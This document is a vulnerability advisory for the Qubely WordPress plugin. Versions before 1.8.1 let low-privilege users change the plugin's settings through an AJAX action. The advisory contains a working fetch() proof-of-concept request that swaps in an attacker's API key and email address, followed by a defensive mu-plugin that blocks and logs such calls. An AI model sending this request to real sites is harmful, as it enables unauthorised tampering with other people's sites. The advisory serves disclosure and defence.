WordPress Plugin Vulnerabilities
Qubely < 1.8.1 - Authenticated Arbitrary Settings Update
Description
The plugin does not perform proper authorisation checks when saving its settings, allowing users with a role as low as subscriber (in versions < 1.7.9) or contributor (in versions < 1.8.1) to update them.
Proof of Concept
As a subscriber (the nonce can be taken from the qubely_local_script-js-extra script on the homepage):

fetch("http://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": new URLSearchParams({
    "action": "update_qubely_options",
    "options[qubely_gmap_api_key]": "attacker-key",
    "options[form_from_name]": "Attacker",
    "options[form_from_email]": "attacker@domain.com",
    "_wpnonce": "602dfb5e65"
  }),
  "method": "POST",
  "credentials": "include"
});
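Because the nonce is served to every visitor, it only protects against CSRF and cannot stand in for a capability check. The following must-use plugin is an added example (not code from this advisory or from Qubely) of a stop-gap guard for sites that cannot update immediately. The file name, the qsg_ prefix, the manage_options capability and the assumption that the plugin's handler is registered at the default hook priority are all assumptions.

```php
<?php
/**
 * Plugin Name: Qubely settings guard (added example, hypothetical mu-plugin)
 *
 * Place in wp-content/mu-plugins/ as a stop-gap on sites still running
 * Qubely < 1.8.1. Not part of Qubely; the real fix is updating the plugin.
 */

// Capability required to change settings. ASSUMPTION: manage_options
// (administrators); the advisory does not say what the fixed plugin checks.
const QSG_REQUIRED_CAP = 'manage_options';

// Priority 0 runs before handlers registered at the default priority 10
// (ASSUMPTION: the plugin uses the default), so an unauthorised request is
// rejected before any settings handler sees it.
add_action( 'wp_ajax_update_qubely_options', 'qsg_guard_settings_update', 0 );

function qsg_guard_settings_update() {
    if ( current_user_can( QSG_REQUIRED_CAP ) ) {
        return; // Authorised: let the plugin's own handler continue.
    }

    // Record who tried and which option names were sent. Names only, never
    // values, so API keys or e-mail addresses do not end up in the log.
    $options = isset( $_POST['options'] ) && is_array( $_POST['options'] )
        ? array_map( 'sanitize_key', array_keys( $_POST['options'] ) )
        : array();

    error_log( sprintf(
        'qsg: blocked update_qubely_options user_id=%d ip=%s options=%s',
        get_current_user_id(),
        isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '-',
        implode( ',', $options )
    ) );

    // wp_send_json_error() ends the request, so later handlers never run.
    wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
}
```

The "qsg: blocked" lines in the PHP error log double as a detection signal: any entry with a subscriber or contributor user_id indicates an attempt to reach the settings handler.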
Affects Plugins
Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Jan w Oleju
Submitter
Jan w Oleju
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-06-06
Added
2022-06-06
Last Updated
2022-06-14